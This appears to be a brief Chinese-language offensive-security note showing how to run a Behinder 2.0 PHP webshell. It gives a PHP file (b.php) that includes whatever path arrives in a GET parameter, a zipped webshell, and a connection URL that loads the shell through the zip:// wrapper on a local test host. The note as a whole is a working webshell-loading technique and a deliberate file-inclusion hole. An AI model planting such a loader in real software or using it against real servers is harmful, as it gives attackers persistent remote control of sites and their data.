.

b.php

<?php

$file=@$_GET[x];
include $file;

a.zip

打包Webshell,当前使用的是冰蝎2.0的PHP Webshell

冰蝎连接: http://192.168.74.141/Troj/b.php?x=zip://C:\xampp\htdocs\Troj\a.zip%23a.php

 不过要注意 zip://[文件绝对路径]#webshell

zip